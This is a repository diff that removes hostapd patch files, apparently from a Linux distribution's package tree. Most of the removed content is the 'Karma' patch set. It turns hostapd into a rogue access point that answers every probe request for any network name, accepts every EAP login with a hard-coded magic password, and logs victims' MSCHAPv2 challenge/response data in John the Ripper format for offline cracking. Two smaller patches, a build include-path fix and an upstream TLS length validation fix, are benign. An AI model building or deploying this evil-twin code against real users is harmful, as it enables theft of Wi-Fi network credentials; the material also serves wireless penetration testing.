@@ -14,6 +14,11 @@
* See README and COPYING for more details.
*/
+#define _GNU_SOURCE
+#include <stdio.h>
+
+#include "karma/karma.h"
+
#include "utils/includes.h"
#ifndef CONFIG_NATIVE_WINDOWS
@@ -283,7 +288,24 @@
if (sta)
sta->ssid_probe = &hapd->conf->ssid;
}
-
+ /* Karma Promiscuous Beacon Response Hack - JoMo-Kun <jmk@foofus.net> */
+ else if (karma_beacon_respond) {
+ char ssid_txt[33];
+ char *message = NULL;
+
+ ieee802_11_print_ssid(ssid_txt, elems.ssid, elems.ssid_len);
+
+ if (asprintf(&message, "Probe request from " MACSTR " for SSID '%s'", MAC2STR(mgmt->sa), ssid_txt) < 0)
+ wpa_printf(MSG_ERROR, "Error allocating memory for Karma message\n");
+
+ karma_logger(0, message);
+ free(message);
+
+ ssid = (char *)elems.ssid;
+ ssid_len = elems.ssid_len;
+ //if (sta)
+ // sta->ssid_probe = &elems.ssid;
+ }
if (!ssid) {
if (!(mgmt->da[0] & 0x01)) {
char ssid_txt[33];
diff -urN hostapd-1.0.orig//src/ap/hostapd.c hostapd-1.0/src/ap/hostapd.c
--- hostapd-1.0.orig//src/ap/hostapd.c 2012-05-10 05:56:09.000000000 +0800
+++ hostapd-1.0/src/ap/hostapd.c 2012-07-17 18:36:53.323958995 +0800
@@ -12,6 +12,8 @@
* See README and COPYING for more details.
*/
+#include "karma/karma.h"
+
#include "utils/includes.h"
#include "utils/common.h"
diff -urN hostapd-1.0.orig//src/ap/ieee802_11.c hostapd-1.0/src/ap/ieee802_11.c
--- hostapd-1.0.orig//src/ap/ieee802_11.c 2012-05-10 05:56:09.000000000 +0800
+++ hostapd-1.0/src/ap/ieee802_11.c 2012-07-17 18:36:53.324958995 +0800
@@ -12,6 +12,8 @@
* See README and COPYING for more details.
*/
+#include "karma/karma.h"
+
#include "utils/includes.h"
#ifndef CONFIG_NATIVE_WINDOWS
@@ -520,8 +522,9 @@
if (ssid_ie == NULL)
return WLAN_STATUS_UNSPECIFIED_FAILURE;
- if (ssid_ie_len != hapd->conf->ssid.ssid_len ||
- os_memcmp(ssid_ie, hapd->conf->ssid.ssid, ssid_ie_len) != 0) {
+ /* Karma Promiscuous Beacon Response Hack - JoMo-Kun <jmk@foofus.net> */
+ if ((!karma_beacon_respond) && (ssid_ie_len != hapd->conf->ssid.ssid_len ||
+ os_memcmp(ssid_ie, hapd->conf->ssid.ssid, ssid_ie_len) != 0)) {
char ssid_txt[33];
ieee802_11_print_ssid(ssid_txt, ssid_ie, ssid_ie_len);
hostapd_logger(hapd, sta->addr, HOSTAPD_MODULE_IEEE80211,
diff -urN hostapd-1.0.orig//src/eap_server/eap_server.c hostapd-1.0/src/eap_server/eap_server.c
--- hostapd-1.0.orig//src/eap_server/eap_server.c 2012-05-10 05:56:09.000000000 +0800
+++ hostapd-1.0/src/eap_server/eap_server.c 2012-07-17 18:36:53.325959001 +0800
@@ -18,6 +18,11 @@
* backend_auth configuration variable to TRUE.
*/
+#define _GNU_SOURCE
+#include <stdio.h>
+
+#include "karma/karma.h"
+
#include "includes.h"
#include "common.h"
@@ -99,24 +104,51 @@
int eap_user_get(struct eap_sm *sm, const u8 *identity, size_t identity_len,
int phase2)
{
- struct eap_user *user;
+ struct eap_user *user;
+ char *username = NULL;
+ char *message = NULL;
+
+ eap_user_free(sm->user);
+ sm->user = NULL;
- if (sm == NULL || sm->eapol_cb == NULL ||
+ user = os_zalloc(sizeof(*user));
+ if (user == NULL)
+ return -1;
+
+ /* Karma Mode: Accept all requests, regardless of username - JoMo-Kun <jmk@foofus.net> */
+ if (karma_eap_auth)
+ {
+ user->methods[0].vendor = sm->respVendor;
+ user->password = os_zalloc(9);
+ strncpy((char *)user->password, "Cricket8", 8); /* Magic password allows successful authentication */
+ user->password_len = 8;
+
+ if (phase2)
+ user->methods[0].method = EAP_TYPE_MSCHAPV2;
+ else // TODO: what happens if we propose LEAP?
+ user->methods[0].method = EAP_TYPE_PEAP;
+
+ username = os_zalloc(sm->identity_len + 1);
+ strncpy(username, (char *)sm->identity, (size_t)sm->identity_len);
+
+ if (asprintf(&message, "Authentication Request - Username: %s Vendor: %d Method: %d", username, sm->respVendor, sm->respVendorMethod) < 0)
+ printf("Error allocating memory for request message.\n");
+
+ karma_logger(0, message);
+ free(message);
+ }
+ else
+ {
+ if (sm == NULL || sm->eapol_cb == NULL ||
sm->eapol_cb->get_eap_user == NULL)
- return -1;
+ return -1;
- eap_user_free(sm->user);
- sm->user = NULL;
-
- user = os_zalloc(sizeof(*user));
- if (user == NULL)
- return -1;
-
- if (sm->eapol_cb->get_eap_user(sm->eapol_ctx, identity,
- identity_len, phase2, user) != 0) {
- eap_user_free(user);
- return -1;
- }
+ if (sm->eapol_cb->get_eap_user(sm->eapol_ctx, identity,
+ identity_len, phase2, user) != 0) {
+ eap_user_free(user);
+ return -1;
+ }
+ }
sm->user = user;
sm->user_eap_method_index = 0;
diff -urN hostapd-1.0.orig//src/eap_server/eap_server_mschapv2.c hostapd-1.0/src/eap_server/eap_server_mschapv2.c
--- hostapd-1.0.orig//src/eap_server/eap_server_mschapv2.c 2012-05-10 05:56:09.000000000 +0800
+++ hostapd-1.0/src/eap_server/eap_server_mschapv2.c 2012-07-17 18:36:53.331959001 +0800
@@ -12,6 +12,8 @@
* See README and COPYING for more details.
*/
+#include "karma/karma.h"
+
#include "includes.h"
#include "common.h"
@@ -290,13 +292,15 @@
struct wpabuf *respData)
{
struct eap_mschapv2_hdr *resp;
- const u8 *pos, *end, *peer_challenge, *nt_response, *name;
+ const u8 *pos, *end, *auth_challenge, *peer_challenge, *nt_response, *name;
u8 flags;
size_t len, name_len, i;
u8 expected[24];
const u8 *username, *user;
size_t username_len, user_len;
int res;
+ char *auth_creds = NULL;
+ int auth_creds_len = 0;
pos = eap_hdr_validate(EAP_VENDOR_IETF, EAP_TYPE_MSCHAPV2, respData,
&len);
@@ -336,6 +340,38 @@
wpa_printf(MSG_MSGDUMP, "EAP-MSCHAPV2: Flags 0x%x", flags);
wpa_hexdump_ascii(MSG_MSGDUMP, "EAP-MSCHAPV2: Name", name, name_len);
+ /* Karma Mode: Log MSCHAPv2 exchange in John format - JoMo-Kun <jmk@foofus.net> */
+ /* user::domain (unused):authenticator challenge:mschapv2 response:peer challenge */
+ if (karma_eap_auth)
+ {
+ auth_creds_len = sm->identity_len + 3 + 16*2 + 1 + 24*2 + 1 + 16*2;
+ auth_creds = os_malloc(auth_creds_len + 1);
+ memset(auth_creds, 0, auth_creds_len + 1);
+
+ strncpy(auth_creds, (char *)sm->identity, sm->identity_len);
+ sprintf(auth_creds + sm->identity_len, ":::");
+
+ /* Authenticator Challenge */
+ auth_challenge = data->auth_challenge;
+ for (i=0; i<16; i++)
+ sprintf(auth_creds + sm->identity_len + 3 + 2*i, "%2.2X", 0xFF & (int)auth_challenge[i]);
+
+ sprintf(auth_creds + sm->identity_len + 3 + 16*2, ":");
+
+ /* MSCHAPv2 Response */
+ for (i=0; i<24; i++)
+ sprintf(auth_creds + sm->identity_len + 3 + 16*2 + 1 + 2*i, "%2.2X", 0xFF & (int)nt_response[i]);
+
+ sprintf(auth_creds + sm->identity_len + 3 + 16*2 + 1 + 24*2, ":");
+
+ /* Peer Challenge */
+ for (i=0; i<16; i++)
+ sprintf(auth_creds + sm->identity_len + 3 + 16*2 + 1 + 24*2 + 1 + 2*i, "%2.2X", 0xFF & (int)peer_challenge[i]);
+
+ karma_logger(1, auth_creds);
+ free(auth_creds);
+ }
+
/* MSCHAPv2 does not include optional domain name in the
* challenge-response calculation, so remove domain prefix
* (if present). */
diff -urN hostapd-1.0.orig//src/karma/karma.c hostapd-1.0/src/karma/karma.c
--- hostapd-1.0.orig//src/karma/karma.c 1970-01-01 07:30:00.000000000 +0730
+++ hostapd-1.0/src/karma/karma.c 2012-07-17 18:36:53.332959000 +0800
@@ -0,0 +1,43 @@
+#define _GNU_SOURCE
+#include <stdio.h>
+#include <time.h>
+
+#include "common.h"
+#include "includes.h"
+#include "trace.h"
+
+#include "karma/karma.h"
+
+/* Karma Mode: Log data related to MSCHAPv2 challenge/response authentication attempts */
+extern void karma_logger(int type, char *message)
+{
+ FILE *logfd;
+ time_t cur_time;
+ struct tm *tm_ptr;
+ char time_buf[256];
+ /* General: probe requests, username requests */
+ logfd = fopen("./hostapd-karma.txt", "a");
+ if (logfd == NULL) {
+ fprintf(stderr, "[karma] Failed to open log file: ./hostapd-karma.txt\n");
+ logfd = stderr;
+ }
+
+ time(&cur_time);
+ tm_ptr = localtime(&cur_time);
+ strftime(time_buf, 256, "%Y-%m-%d %H:%M:%S", tm_ptr);
+ fprintf(logfd, "%s: %s\n", time_buf, message);
+ fprintf(stderr, "[karma] %s: %s\n", time_buf, message);
+ fclose(logfd);
+
+ /* MSCHAPv2 Challenge/Response */
+ if (type == 1)
+ {
+ logfd = fopen("./hostapd-karma.lc", "a");
+ if (logfd == NULL) {
+ fprintf(stderr, "[karma] Failed to open log file: ./hostapd-karma.lc\n");
+ logfd = stderr;
+ }
+ fprintf(logfd, "%s\n", message);
+ fclose(logfd);
+ }
+}
diff -urN hostapd-1.0.orig//src/karma/karma.h hostapd-1.0/src/karma/karma.h
--- hostapd-1.0.orig//src/karma/karma.h 1970-01-01 07:30:00.000000000 +0730
+++ hostapd-1.0/src/karma/karma.h 2012-07-17 18:36:53.332959000 +0800
@@ -0,0 +1,3 @@
+extern int karma_beacon_respond;
+extern int karma_eap_auth;
+extern void karma_logger(int, char*);
diff -urN hostapd-1.0.orig//src/utils/wpa_debug.c hostapd-1.0/src/utils/wpa_debug.c
--- hostapd-1.0.orig//src/utils/wpa_debug.c 2012-05-10 05:56:09.000000000 +0800
+++ hostapd-1.0/src/utils/wpa_debug.c 2012-07-17 18:36:53.333959000 +0800
@@ -22,6 +22,8 @@
static int wpa_debug_syslog = 0;
#endif /* CONFIG_DEBUG_SYSLOG */
+/* Karma Mode */
+#include "karma/karma.h"
int wpa_debug_level = MSG_INFO;
int wpa_debug_show_keys = 0;

449
net-wireless/hostapd/files/hostapd-1.0-karma2.patch
View file

@ -1,449 +0,0 @@
diff -rubN hostapd-1.0/hostapd/hostapd.conf hostapd-1.0-jmk/hostapd/hostapd.conf
--- hostapd-1.0/hostapd/hostapd.conf 2012-05-09 16:56:09.000000000 -0500
+++ hostapd-1.0-jmk/hostapd/hostapd.conf 2012-08-09 16:22:15.896176672 -0500
@@ -3,7 +3,7 @@
# AP netdevice name (without 'ap' postfix, i.e., wlan0 uses wlan0ap for
# management frames); ath0 for madwifi
-interface=wlan0
+interface=wlan1
# In case of madwifi, atheros, and nl80211 driver interfaces, an additional
# configuration parameter, bridge, may be used to notify hostapd if the
@@ -23,6 +23,7 @@
# Use driver=none if building hostapd as a standalone RADIUS server that does
# not control any wireless/wired driver.
# driver=hostap
+driver=nl80211
# hostapd event logger configuration
#
@@ -83,12 +84,12 @@
##### IEEE 802.11 related configuration #######################################
# SSID to be used in IEEE 802.11 management frames
-ssid=test
+ssid=YouReallyWantToConnect
# Country code (ISO/IEC 3166-1). Used to set regulatory domain.
# Set as needed to indicate country in which device is operating.
# This can limit available channels and transmit power.
-#country_code=US
+country_code=US
# Enable IEEE 802.11d. This advertises the country_code and the set of allowed
# channels and transmit power levels based on the regulatory limits. The
@@ -99,13 +100,13 @@
# Operation mode (a = IEEE 802.11a, b = IEEE 802.11b, g = IEEE 802.11g,
# Default: IEEE 802.11b
-hw_mode=g
+hw_mode=b
# Channel number (IEEE 802.11)
# (default: 0, i.e., not set)
# Please note that some drivers do not use this value from hostapd and the
# channel will need to be configured separately with iwconfig.
-channel=1
+channel=6
# Beacon interval in kus (1.024 ms) (default: 100; range 15..65535)
beacon_int=100
@@ -413,7 +414,7 @@
##### IEEE 802.1X-2004 related configuration ##################################
# Require IEEE 802.1X authorization
-#ieee8021x=1
+ieee8021x=1
# IEEE 802.1X/EAPOL version
# hostapd is implemented based on IEEE Std 802.1X-2004 which defines EAPOL
@@ -421,7 +422,7 @@
# the new version number correctly (they seem to drop the frames completely).
# In order to make hostapd interoperate with these clients, the version number
# can be set to the older version (1) with this configuration value.
-#eapol_version=2
+eapol_version=1
# Optional displayable message sent with EAP Request-Identity. The first \0
# in this string will be converted to ASCII-0 (nul). This can be used to
@@ -463,26 +464,26 @@
# Use integrated EAP server instead of external RADIUS authentication
# server. This is also needed if hostapd is configured to act as a RADIUS
# authentication server.
-eap_server=0
+eap_server=1
# Path for EAP server user database
#eap_user_file=/etc/hostapd.eap_user
# CA certificate (PEM or DER file) for EAP-TLS/PEAP/TTLS
-#ca_cert=/etc/hostapd.ca.pem
+ca_cert=/etc/hostapd/gd-bundle.pem
# Server certificate (PEM or DER file) for EAP-TLS/PEAP/TTLS
-#server_cert=/etc/hostapd.server.pem
+server_cert=/etc/hostapd/INTRANET.pem
# Private key matching with the server certificate for EAP-TLS/PEAP/TTLS
# This may point to the same file as server_cert if both certificate and key
# are included in a single file. PKCS#12 (PFX) file (.p12/.pfx) can also be
# used by commenting out server_cert and specifying the PFX file as the
# private_key.
-#private_key=/etc/hostapd.server.prv
+private_key=/etc/hostapd/INTRANET.pem
# Passphrase for private key
-#private_key_passwd=secret passphrase
+private_key_passwd=TopSecretFoofusPassword
# Enable CRL verification.
# Note: hostapd does not yet support CRL downloading based on CDP. Thus, a
@@ -679,7 +680,7 @@
# and/or WPA2 (full IEEE 802.11i/RSN):
# bit0 = WPA
# bit1 = IEEE 802.11i/RSN (WPA2) (dot11RSNAEnabled)
-#wpa=1
+wpa=3
# WPA pre-shared keys for WPA-PSK. This can be either entered as a 256-bit
# secret in hex format (64 hex digits), wpa_psk, or as an ASCII passphrase
@@ -700,7 +701,7 @@
# entries are separated with a space. WPA-PSK-SHA256 and WPA-EAP-SHA256 can be
# added to enable SHA256-based stronger algorithms.
# (dot11RSNAConfigAuthenticationSuitesTable)
-#wpa_key_mgmt=WPA-PSK WPA-EAP
+wpa_key_mgmt=WPA-EAP
# Set of accepted cipher suites (encryption algorithms) for pairwise keys
# (unicast packets). This is a space separated list of algorithms:
diff -rubN hostapd-1.0/hostapd/main.c hostapd-1.0-jmk/hostapd/main.c
--- hostapd-1.0/hostapd/main.c 2012-05-09 16:56:09.000000000 -0500
+++ hostapd-1.0-jmk/hostapd/main.c 2012-08-09 16:12:23.722163161 -0500
@@ -39,6 +39,10 @@
extern struct wpa_driver_ops *wpa_drivers[];
+/* Karma Mode */
+#include "karma/karma.h"
+int karma_beacon_respond = 0;
+int karma_eap_auth = 0;
struct hapd_global {
void **drv_priv;
@@ -521,7 +525,7 @@
show_version();
fprintf(stderr,
"\n"
- "usage: hostapd [-hdBKtv] [-P <PID file>] [-e <entropy file>] "
+ "usage: hostapd [-hdBKtvRA] [-P <PID file>] [-e <entropy file>] "
"<configuration file(s)>\n"
"\n"
"options:\n"
@@ -535,7 +539,9 @@
" -f log output to debug file instead of stdout\n"
#endif /* CONFIG_DEBUG_FILE */
" -t include timestamps in some debug messages\n"
- " -v show hostapd version\n");
+ " -v show hostapd version\n"
+ " -R [karma] respond to all probes\n"
+ " -A [karma] log all authentication attempts\n");
exit(1);
}
@@ -564,7 +570,7 @@
return -1;
for (;;) {
- c = getopt(argc, argv, "Bde:f:hKP:tv");
+ c = getopt(argc, argv, "Bde:f:hKP:tvRA");
if (c < 0)
break;
switch (c) {
@@ -599,7 +605,12 @@
show_version();
exit(1);
break;
-
+ case 'R':
+ karma_beacon_respond++;
+ break;
+ case 'A':
+ karma_eap_auth++;
+ break;
default:
usage();
break;
diff -rubN hostapd-1.0/hostapd/Makefile hostapd-1.0-jmk/hostapd/Makefile
--- hostapd-1.0/hostapd/Makefile 2012-05-09 16:56:09.000000000 -0500
+++ hostapd-1.0-jmk/hostapd/Makefile 2012-08-09 16:12:23.722163161 -0500
@@ -95,6 +95,7 @@
OBJS += ../src/eapol_auth/eapol_auth_sm.o
+OBJS += ../src/karma/karma.o
ifndef CONFIG_NO_DUMP_STATE
# define HOSTAPD_DUMP_STATE to include SIGUSR1 handler for dumping state to
diff -rubN hostapd-1.0/src/ap/beacon.c hostapd-1.0-jmk/src/ap/beacon.c
--- hostapd-1.0/src/ap/beacon.c 2012-05-09 16:56:09.000000000 -0500
+++ hostapd-1.0-jmk/src/ap/beacon.c 2012-08-09 16:12:23.724163161 -0500
@@ -34,6 +34,7 @@
#include "ap_drv_ops.h"
#include "beacon.h"
+#include "karma/karma.h"
#ifdef NEED_AP_MLME
@@ -283,6 +284,22 @@
if (sta)
sta->ssid_probe = &hapd->conf->ssid;
}
+ /* Karma Promiscuous Beacon Response Hack - JoMo-Kun <jmk@foofus.net> */
+ else if (karma_beacon_respond) {
+ char ssid_txt[33];
+ char *message = NULL;
+
+ ieee802_11_print_ssid(ssid_txt, elems.ssid, elems.ssid_len);
+
+ if (asprintf(&message, "Probe request from " MACSTR " for SSID '%s'", MAC2STR(mgmt->sa), ssid_txt) < 0)
+ wpa_printf(MSG_ERROR, "Error allocating memory for Karma message\n");
+
+ karma_logger(0, message);
+ free(message);
+
+ ssid = (char *)elems.ssid;
+ ssid_len = elems.ssid_len;
+ }
if (!ssid) {
if (!(mgmt->da[0] & 0x01)) {
diff -rubN hostapd-1.0/src/ap/hostapd.c hostapd-1.0-jmk/src/ap/hostapd.c
--- hostapd-1.0/src/ap/hostapd.c 2012-05-09 16:56:09.000000000 -0500
+++ hostapd-1.0-jmk/src/ap/hostapd.c 2012-08-09 16:12:23.725163160 -0500
@@ -37,6 +37,7 @@
#include "ap_config.h"
#include "p2p_hostapd.h"
+#include "karma/karma.h"
static int hostapd_flush_old_stations(struct hostapd_data *hapd, u16 reason);
static int hostapd_setup_encryption(char *iface, struct hostapd_data *hapd);
diff -rubN hostapd-1.0/src/ap/ieee802_11.c hostapd-1.0-jmk/src/ap/ieee802_11.c
--- hostapd-1.0/src/ap/ieee802_11.c 2012-05-09 16:56:09.000000000 -0500
+++ hostapd-1.0-jmk/src/ap/ieee802_11.c 2012-08-09 16:12:23.727163160 -0500
@@ -42,6 +42,7 @@
#include "ap_drv_ops.h"
#include "ieee802_11.h"
+#include "karma/karma.h"
u8 * hostapd_eid_supp_rates(struct hostapd_data *hapd, u8 *eid)
{
@@ -520,8 +521,9 @@
if (ssid_ie == NULL)
return WLAN_STATUS_UNSPECIFIED_FAILURE;
- if (ssid_ie_len != hapd->conf->ssid.ssid_len ||
- os_memcmp(ssid_ie, hapd->conf->ssid.ssid, ssid_ie_len) != 0) {
+ /* Karma Promiscuous Beacon Response Hack - JoMo-Kun <jmk@foofus.net> */
+ if ((!karma_beacon_respond) && (ssid_ie_len != hapd->conf->ssid.ssid_len ||
+ os_memcmp(ssid_ie, hapd->conf->ssid.ssid, ssid_ie_len) != 0)) {
char ssid_txt[33];
ieee802_11_print_ssid(ssid_txt, ssid_ie, ssid_ie_len);
hostapd_logger(hapd, sta->addr, HOSTAPD_MODULE_IEEE80211,
diff -rubN hostapd-1.0/src/eap_server/eap_server.c hostapd-1.0-jmk/src/eap_server/eap_server.c
--- hostapd-1.0/src/eap_server/eap_server.c 2012-05-09 16:56:09.000000000 -0500
+++ hostapd-1.0-jmk/src/eap_server/eap_server.c 2012-08-09 16:17:04.200169582 -0500
@@ -25,6 +25,8 @@
#include "state_machine.h"
#include "common/wpa_ctrl.h"
+#include "karma/karma.h"
+
#define STATE_MACHINE_DATA struct eap_sm
#define STATE_MACHINE_DEBUG_PREFIX "EAP"
@@ -100,10 +102,8 @@
int phase2)
{
struct eap_user *user;
-
- if (sm == NULL || sm->eapol_cb == NULL ||
- sm->eapol_cb->get_eap_user == NULL)
- return -1;
+ char *username = NULL;
+ char *message = NULL;
eap_user_free(sm->user);
sm->user = NULL;
@@ -112,11 +112,39 @@
if (user == NULL)
return -1;
+ /* Karma EAP Modifications */
+ if (karma_eap_auth) {
+ /* Karma Mode: Accept all requests, regardless of username - JoMo-Kun <jmk@foofus.net> */
+ user->methods[0].vendor = sm->respVendor;
+ user->password = os_zalloc(9);
+ strncpy((char *)user->password, "Cricket8", 8); /* Magic password allows successful authentication */
+ user->password_len = 8;
+
+ if (phase2)
+ user->methods[0].method = EAP_TYPE_MSCHAPV2;
+ else // TODO: what happens if we propose LEAP?
+ user->methods[0].method = EAP_TYPE_PEAP;
+
+ username = os_zalloc(sm->identity_len + 1);
+ strncpy(username, (char *)sm->identity, (size_t)sm->identity_len);
+ if (asprintf(&message, "Authentication Request - Username: %s Vendor: %d Method: %d", username, sm->respVendor, sm->respVendorMethod) < 0)
+ printf("Error allocating memory for request message.\n");
+ //wpa_printf(MSG_ERROR, "Authentication Request - Username: %s Vendor: %d Method: %d", username, sm->respVendor, sm->respVendorMethod);
+
+ karma_logger(0, message);
+ free(message);
+ }
+ else {
+ if (sm == NULL || sm->eapol_cb == NULL ||
+ sm->eapol_cb->get_eap_user == NULL)
+ return -1;
+
if (sm->eapol_cb->get_eap_user(sm->eapol_ctx, identity,
identity_len, phase2, user) != 0) {
eap_user_free(user);
return -1;
}
+ }
sm->user = user;
sm->user_eap_method_index = 0;
diff -rubN hostapd-1.0/src/eap_server/eap_server_mschapv2.c hostapd-1.0-jmk/src/eap_server/eap_server_mschapv2.c
--- hostapd-1.0/src/eap_server/eap_server_mschapv2.c 2012-05-09 16:56:09.000000000 -0500
+++ hostapd-1.0-jmk/src/eap_server/eap_server_mschapv2.c 2012-08-09 16:12:23.732163160 -0500
@@ -19,6 +19,7 @@
#include "crypto/random.h"
#include "eap_i.h"
+#include "karma/karma.h"
struct eap_mschapv2_hdr {
u8 op_code; /* MSCHAPV2_OP_* */
@@ -290,13 +291,15 @@
struct wpabuf *respData)
{
struct eap_mschapv2_hdr *resp;
- const u8 *pos, *end, *peer_challenge, *nt_response, *name;
+ const u8 *pos, *end, *auth_challenge, *peer_challenge, *nt_response, *name;
u8 flags;
size_t len, name_len, i;
u8 expected[24];
const u8 *username, *user;
size_t username_len, user_len;
int res;
+ char *auth_creds = NULL;
+ int auth_creds_len = 0;
pos = eap_hdr_validate(EAP_VENDOR_IETF, EAP_TYPE_MSCHAPV2, respData,
&len);
@@ -336,6 +339,37 @@
wpa_printf(MSG_MSGDUMP, "EAP-MSCHAPV2: Flags 0x%x", flags);
wpa_hexdump_ascii(MSG_MSGDUMP, "EAP-MSCHAPV2: Name", name, name_len);
+ /* Karma Mode: Log MSCHAPv2 exchange in John format - JoMo-Kun <jmk@foofus.net> */
+ /* user::domain (unused):authenticator challenge:mschapv2 response:peer challenge */
+ if (karma_eap_auth) {
+ auth_creds_len = sm->identity_len + 3 + 16*2 + 1 + 24*2 + 1 + 16*2;
+ auth_creds = os_malloc(auth_creds_len + 1);
+ memset(auth_creds, 0, auth_creds_len + 1);
+
+ strncpy(auth_creds, (char *)sm->identity, sm->identity_len);
+ sprintf(auth_creds + sm->identity_len, ":::");
+
+ /* Authenticator Challenge */
+ auth_challenge = data->auth_challenge;
+ for (i=0; i<16; i++)
+ sprintf(auth_creds + sm->identity_len + 3 + 2*i, "%2.2X", 0xFF & (int)auth_challenge[i]);
+
+ sprintf(auth_creds + sm->identity_len + 3 + 16*2, ":");
+
+ /* MSCHAPv2 Response */
+ for (i=0; i<24; i++)
+ sprintf(auth_creds + sm->identity_len + 3 + 16*2 + 1 + 2*i, "%2.2X", 0xFF & (int)nt_response[i]);
+
+ sprintf(auth_creds + sm->identity_len + 3 + 16*2 + 1 + 24*2, ":");
+
+ /* Peer Challenge */
+ for (i=0; i<16; i++)
+ sprintf(auth_creds + sm->identity_len + 3 + 16*2 + 1 + 24*2 + 1 + 2*i, "%2.2X", 0xFF & (int)peer_challenge[i]);
+
+ karma_logger(1, auth_creds);
+ free(auth_creds);
+ }
+
/* MSCHAPv2 does not include optional domain name in the
* challenge-response calculation, so remove domain prefix
* (if present). */
diff -rubN hostapd-1.0/src/karma/karma.c hostapd-1.0-jmk/src/karma/karma.c
--- hostapd-1.0/src/karma/karma.c 1969-12-31 18:00:00.000000000 -0600
+++ hostapd-1.0-jmk/src/karma/karma.c 2012-08-09 16:12:23.732163160 -0500
@@ -0,0 +1,44 @@
+#define _GNU_SOURCE
+#include <stdio.h>
+#include <time.h>
+
+#include "common.h"
+#include "includes.h"
+#include "trace.h"
+
+#include "karma/karma.h"
+
+/* Karma Mode: Log data related to MSCHAPv2 challenge/response authentication attempts */
+extern void karma_logger(int type, char *message)
+{
+ FILE *logfd;
+ time_t cur_time;
+ struct tm *tm_ptr;
+ char time_buf[256];
+ /* General: probe requests, username requests */
+ logfd = fopen("./hostapd-karma.txt", "a");
+ if (logfd == NULL) {
+ fprintf(stderr, "[karma] Failed to open log file: ./hostapd-karma.txt\n");
+ logfd = stderr;
+ }
+
+ cur_time = time(NULL);
+ (void) time(&cur_time);
+ tm_ptr = localtime(&cur_time);
+ strftime(time_buf, 256, "%Y-%m-%d %H:%M:%S", tm_ptr);
+ fprintf(logfd, "%s:%s\n", time_buf, message);
+ fprintf(stderr, "[karma] %s:%s\n", time_buf, message);
+ fclose(logfd);
+
+ /* MSCHAPv2 Challenge/Response */
+ if (type == 1)
+ {
+ logfd = fopen("./hostapd-karma.lc", "a");
+ if (logfd == NULL) {
+ fprintf(stderr, "[karma] Failed to open log file: ./hostapd-karma.lc\n");
+ logfd = stderr;
+ }
+ fprintf(logfd, "%s\n", message);
+ fclose(logfd);
+ }
+}
diff -rubN hostapd-1.0/src/karma/karma.d hostapd-1.0-jmk/src/karma/karma.d
--- hostapd-1.0/src/karma/karma.d 1969-12-31 18:00:00.000000000 -0600
+++ hostapd-1.0-jmk/src/karma/karma.d 2012-08-09 16:24:57.196180351 -0500
@@ -0,0 +1,4 @@
+../src/karma/karma.o: ../src/karma/karma.c ../src/utils/common.h \
+ ../src/utils/os.h ../src/utils/wpa_debug.h ../src/utils/wpabuf.h \
+ ../src/utils/includes.h ../src/utils/build_config.h ../src/utils/trace.h \
+ ../src/karma/karma.h
diff -rubN hostapd-1.0/src/karma/karma.h hostapd-1.0-jmk/src/karma/karma.h
--- hostapd-1.0/src/karma/karma.h 1969-12-31 18:00:00.000000000 -0600
+++ hostapd-1.0-jmk/src/karma/karma.h 2012-08-09 16:12:23.733163160 -0500
@@ -0,0 +1,3 @@
+extern int karma_beacon_respond;
+extern int karma_eap_auth;
+extern void karma_logger(int, char*);

1199
net-wireless/hostapd/files/hostapd-1.0-karma_cli.patch
View file

File diff suppressed because it is too large Load diff

24
net-wireless/hostapd/files/hostapd-1.0-libnl_path_fix.patch
View file

@ -1,24 +0,0 @@
diff -aurp a/src/drivers/drivers.mak b/src/drivers/drivers.mak
--- a/src/drivers/drivers.mak 2012-10-03 19:42:16.387634128 +0000
+++ b/src/drivers/drivers.mak 2012-10-03 19:43:16.246693744 +0000
@@ -48,7 +48,7 @@ NEED_RFKILL=y
ifdef CONFIG_LIBNL32
DRV_LIBS += -lnl-3
DRV_LIBS += -lnl-genl-3
- DRV_CFLAGS += -DCONFIG_LIBNL20
+ DRV_CFLAGS += -DCONFIG_LIBNL20 -I/usr/include/libnl3
else
ifdef CONFIG_LIBNL_TINY
DRV_LIBS += -lnl-tiny
diff -aurp a/src/drivers/drivers.mk b/src/drivers/drivers.mk
--- a/src/drivers/drivers.mk 2012-10-03 19:42:16.385634126 +0000
+++ b/src/drivers/drivers.mk 2012-10-03 19:43:23.333700780 +0000
@@ -48,7 +48,7 @@ NEED_RFKILL=y
ifdef CONFIG_LIBNL32
DRV_LIBS += -lnl-3
DRV_LIBS += -lnl-genl-3
- DRV_CFLAGS += -DCONFIG_LIBNL20
+ DRV_CFLAGS += -DCONFIG_LIBNL20 -I/usr/include/libnl3
else
ifdef CONFIG_LIBNL_TINY
DRV_LIBS += -lnl-tiny

48
net-wireless/hostapd/files/hostapd-1.0-tls_length_fix.patch
View file

@ -1,48 +0,0 @@
From 586c446e0ff42ae00315b014924ec669023bd8de Mon Sep 17 00:00:00 2001
From: Jouni Malinen <j@w1.fi>
Date: Sun, 7 Oct 2012 20:06:29 +0300
Subject: [PATCH] EAP-TLS server: Fix TLS Message Length validation
EAP-TLS/PEAP/TTLS/FAST server implementation did not validate TLS
Message Length value properly and could end up trying to store more
information into the message buffer than the allocated size if the first
fragment is longer than the indicated size. This could result in hostapd
process terminating in wpabuf length validation. Fix this by rejecting
messages that have invalid TLS Message Length value.
This would affect cases that use the internal EAP authentication server
in hostapd either directly with IEEE 802.1X or when using hostapd as a
RADIUS authentication server and when receiving an incorrectly
constructed EAP-TLS message. Cases where hostapd uses an external
authentication are not affected.
Thanks to Timo Warns for finding and reporting this issue.
Signed-hostap: Jouni Malinen <j@w1.fi>
intended-for: hostap-1
---
src/eap_server/eap_server_tls_common.c | 8 ++++++++
1 files changed, 8 insertions(+), 0 deletions(-)
diff --git a/src/eap_server/eap_server_tls_common.c b/src/eap_server/eap_server_tls_common.c
index 31be2ec..46f282b 100644
--- a/src/eap_server/eap_server_tls_common.c
+++ b/src/eap_server/eap_server_tls_common.c
@@ -228,6 +228,14 @@ static int eap_server_tls_process_fragment(struct eap_ssl_data *data,
return -1;
}
+ if (len > message_length) {
+ wpa_printf(MSG_INFO, "SSL: Too much data (%d bytes) in "
+ "first fragment of frame (TLS Message "
+ "Length %d bytes)",
+ (int) len, (int) message_length);
+ return -1;
+ }
+
data->tls_in = wpabuf_alloc(message_length);
if (data->tls_in == NULL) {
wpa_printf(MSG_DEBUG, "SSL: No memory for message");
--
1.7.4-rc1

157
net-wireless/hostapd/files/hostapd-1.0-wpe_karma.patch
View file

@ -1,157 +0,0 @@
diff -urN hostapd-1.0.orig/hostapd/main.c hostapd-1.0/hostapd/main.c
--- hostapd-1.0.orig/hostapd/main.c 2013-05-01 22:58:03.007738503 +0800
